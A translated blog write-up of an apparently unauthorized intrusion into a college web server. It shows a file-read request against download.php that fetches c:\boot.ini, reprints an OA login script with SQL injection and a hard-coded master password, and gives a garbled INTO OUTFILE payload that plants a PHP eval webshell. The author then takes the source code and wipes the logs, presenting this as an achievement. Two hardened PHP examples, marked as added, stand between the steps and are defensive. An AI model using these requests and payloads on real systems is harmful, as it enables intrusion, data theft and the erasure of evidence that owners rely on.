[Attack and Defense Notes] A Twisting and Turning Security Test

By: Cai
This security test was done a while ago, and I never had time to write it up. Some details of the environment may have been forgotten, but the overall process and the ideas behind it are still very clear. Because I work in the school's Network Studio outside class, I pay closer attention to the services and development of some school websites. During this period I found that the file exchange system of one college was very good, and using it on the campus network brought a lot of convenience. I searched the Internet and found no ready-made system to download. Would I have to write one myself...

Steps:
The server had ports 21 and 80 open, running Serv-U 6.2 and Apache/2.055 (win32) with PHP/5.1.2; the same server also hosted an OA system. Black-box testing came first: I tried uploading a script file. The file could be uploaded, but the code was not parsed... I captured packets during the upload, constructed requests for non-existent files and sent them, but no sensitive information was exposed. Scanning the whole file exchange (swap) system turned up config.php, and Google revealed no other files. Didn't I say there was also an OA system? Google did show dynamic pages of the OA system, but every page first checks whether the visitor is on an internal IP address; if not, it redirects straight to a login page, so testing was completely stuck here. After leaving and coming back several times, the tests still produced nothing. Could I really not take it? During another test, the URL I extracted caught my attention.

hxxp://www.xxx.edu.cn/ex/download.php?url=...

The url parameter looked like it should be an absolute path, so could it be changed to point at a different file?
Packet capture:

GET /ex/download.php?url=... HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0
Under Win32 PHP usually runs with SYSTEM privileges, so a file read simply means reading c:\boot.ini. Telnet to the server's IP on port 80 and send the following modified request.

Modified request:

GET /ex/download.php?url=c%3A%5Cboot.ini HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0

The response returned the contents of boot.ini!

The next problem was guessing the path of the web directory. The web path can be found in the PHP or Apache configuration files, or in the captured packets above. I tried d:\wwwroot\ex, and since no error message came back, the path was right. Then I read the file exchange system's code: the files are linked together, there are seven PHP files in all, and no shell could be obtained through this system. The OA system's path should be d:\wwwroot\oa, which was exactly right! The first file read was config.php, to check for sensitive information. The exposed database connection information was a local connection with root privileges. Then I scanned the OA files, testing whether reading a large number of source files could get me a shell?... ... Disheartening.
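The root cause above is a download handler that takes a client-supplied path (url=c%3A%5Cboot.ini) and reads it. The following is an added example of how such a handler should be written, not the file exchange system's own code; it assumes modern PHP and that all downloadable files live in one directory (the d:\wwwroot\ex\files location is a placeholder).

```php
<?php
// Hardened replacement for a download.php-style handler (added example, not the
// file exchange system's own code). Assumes downloadable files live in one
// directory, $base_dir, and that the client names a file, never a path.
declare(strict_types=1);

function resolve_download_path(string $base_dir, string $requested): ?string
{
    $base = realpath($base_dir);           // false if the directory is missing
    if ($base === false) {
        return null;
    }
    // Allow only a bare file name: no slashes or backslashes, no drive letter,
    // no leading dot, no NUL byte. A value such as c:\boot.ini is rejected
    // before any file system access happens.
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}$/', $requested)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // realpath() has resolved ".." and symlinks; the result must still sit
    // under the base directory, otherwise it points outside the download area.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Assumed layout (placeholder): d:\wwwroot\ex\files holds the exchanged files.
$path = resolve_download_path('d:\\wwwroot\\ex\\files', (string) ($_GET['file'] ?? ''));
if ($path === null) {
    http_response_code(404);       // same answer for missing and forbidden files
    exit('file not found');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

Because the prefix check runs on the realpath() result, a symlink inside the download directory that points at the web root or a configuration file is refused as well.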

Breakthrough:

When you are stuck like this, giving up feels wrong. Keep going: even reading the whole code base might yield nothing, but at least you can check whether input is filtered. First open the login page, enter a user name and password, submit and capture the packets. The captured request goes to check.php; read its code. It is written as follows:

<?php
// echo "System maintenance, please visit later!"; exit;
require("config.php");
require("public/f_main.php");
require("f_db/".$Database[type].".php");

session_start();

$db = new sql_db($Database[server], $Database[username], $Database[password], $Database[dbname], false);
if (!$db->db_connect_id)
{
    MsgGo("Database connection failed!", "exit");
}

// Every POST field becomes a global variable named after its key (register_globals style);
// nothing is validated or escaped
foreach ($_POST as $key => $value) $$key = $value;

// User password verification: $user_name is interpolated straight into the query
$sql = "SELECT a.*, b.dep_name, b.dep_parent_id, b.dep_id AS dep_id, c.dep_name AS dep_parent_name
        FROM t_user a
        LEFT JOIN t_dep b ON a.dep_id = b.dep_id
        LEFT JOIN t_dep c ON c.dep_id = b.dep_parent_id
        WHERE user_name = '$user_name'";
if (!($result = $db->sql_query($sql))) MsgGo("Data query failed!", "login.php");
if ($row = $db->sql_fetchrow($result)) {
    if ($row["user_status"] != "1") {
        MsgGo("This user is disabled and cannot log on!", "login.php");
    } else {
        // md5 check, legacy crypt() check, and a hard-coded master password
        if (md5($user_password) == $row["user_password"] || crypt($user_password, $row["user_password_old"]) == $row["user_password_old"] || $user_password == "qwert12345")
        {
            if ($row["user_password_old"] != "" && $user_password != "qwert12345") {
                $sql = "UPDATE t_user SET
                        user_password = '".md5($user_password)."',
                        user_password_old = ''
                        WHERE user_name = '$user_name'";
                if (!$result = $db->sql_query($sql)) {
                    MsgGo("Data query failed!", "login.php");
                }
            }
            $sql = "UPDATE t_user SET
                    last_login_time = '".time()."'
                    WHERE user_name = '$user_name'";
            if (!$result = $db->sql_query($sql)) {
                MsgGo("Data query failed!", "login.php");
            }
            $_SESSION["sess_user_name"] = $row["user_name"];
            $_SESSION["sess_user_type"] = $row["user_type"];
            $_SESSION["sess_user_real_name"] = $row["user_real_name"];
            $_SESSION["sess_user_level"] = $row["user_level"];
            $_SESSION["sess_dep_id"] = $row["dep_id"];
            $_SESSION["sess_dep_name"] = $row["dep_name"];

            if ($row["dep_parent_id"] == "1") {
                $_SESSION["sess_dep_level"] = "1";
                $_SESSION["sess_dep_id1"] = $row["dep_id"];
                $_SESSION["sess_dep_parent_id"] = $row["dep_parent_id"];
                $_SESSION["sess_dep_parent_name"] = $row["dep_parent_name"];
            } elseif ($row["dep_parent_id"] > "1") {
                $_SESSION["sess_dep_level"] = "2";
                $_SESSION["sess_dep_id1"] = $row["dep_parent_id"];
                $_SESSION["sess_dep_parent_id"] = $row["dep_parent_id"];
                $_SESSION["sess_dep_parent_name"] = $row["dep_parent_name"];
            }

            WriteLog("Logged on to the system");

            // WriteCookie("username_recent", $_SESSION["sess_user_name"], 24*30);
            setcookie("username_recent", $_SESSION["sess_user_name"], time() + 3600*24*30);

            // Go to the system home page
            echo "<script language=javascript>";
            if ($go != "") {
                echo "location='{$go}?filter=".urlencode($filter)."'";
            } else {
                if ($row["user_type"] != "101") echo "location='login/index.php'";
                else echo "location='index.php'";
            }

            echo "</script>";
        } else {
            MsgGo("Incorrect password!", "login.php");
        }
    }
} else {
    MsgGo("Username error!", "login.php");
}

?>

We can see that check.php does almost no filtering, which leads directly to SQL injection! There seem to be many similar articles on the Internet. First, 24 columns are found, and then
Union select 1, <, ">? @ Eval ($ HTTP_POST_VARS [a])?>, 3, 4, 5, 6, 7, 8, 9, 0, 1, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4 into outfile d: wwwrootoadir. php /*
Submit!

Now hxxp://www.xxx.edu.cn/oa/dir.php is our shell address.

This shell needs no privilege escalation... ... Just drag the file exchange and OA packages home; there is nothing else there, and the logs are wiped.

The whole process was full of twists and turns. It was hard. If you understand this, you might as well write the program yourself; asking around for a program with holes -_-, alas. After reading the code carefully, the problem lay in download.php, where one function was written incorrectly... ... It really confirms the saying "security is a little sloppy!" My goal was to use this program, not to penetrate any further. Through one small gap, the entire server group may fall! Security is no small matter!
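For contrast with the check.php shown above, here is an added example of how the login check should look (not the OA system's code). It assumes modern PHP with PDO, a t_user table whose user_password column holds password_hash() output, and a dedicated database account whose password comes from an environment variable instead of config.php; all of these are assumptions.

```php
<?php
// Hardened login check for an OA-style check.php, written as an added example
// (not the OA system's code). Assumes modern PHP with PDO, a t_user table whose
// user_password column holds password_hash() output, and the DB password in an
// environment variable rather than in config.php (all of this is assumed).
declare(strict_types=1);

function authenticate(PDO $db, string $user_name, string $user_password): ?array
{
    if ($user_name === '' || strlen($user_name) > 64) {
        return null;
    }
    // The user name travels as a bound parameter, never spliced into the SQL
    // text, so a value containing "' UNION SELECT ..." is only a string to look up.
    $stmt = $db->prepare(
        'SELECT a.user_name, a.user_password, a.user_status, a.user_type, b.dep_name
           FROM t_user a LEFT JOIN t_dep b ON a.dep_id = b.dep_id
          WHERE a.user_name = :user_name'
    );
    $stmt->execute([':user_name' => $user_name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // One reply for unknown user, disabled user and wrong password; no md5(),
    // no crypt() fallback on a legacy column, and no built-in master password.
    if ($row === false || (string) $row['user_status'] !== '1'
        || !password_verify($user_password, (string) $row['user_password'])) {
        return null;
    }
    unset($row['user_password']);
    return $row;
}

// Dedicated, least-privilege DB account instead of root: a root login holds the
// FILE privilege, which is what lets an injection write files under the web root.
$db = new PDO('mysql:host=127.0.0.1;dbname=oa;charset=utf8mb4', 'oa_app',
    getenv('OA_DB_PASSWORD') ?: '',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]);

// Read the two named fields only; never turn client-supplied keys into variables
// (the original foreach ($_POST as $key => $value) $$key = $value; did exactly that).
$user = authenticate($db, (string) ($_POST['user_name'] ?? ''),
                          (string) ($_POST['user_password'] ?? ''));
session_start();
if ($user === null) {
    http_response_code(401);
    exit('Username or password error!');
}
session_regenerate_id(true);                 // fresh session id on login
$_SESSION['sess_user_name'] = $user['user_name'];
$_SESSION['sess_user_type'] = $user['user_type'];
$_SESSION['sess_dep_name']  = $user['dep_name'];
```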
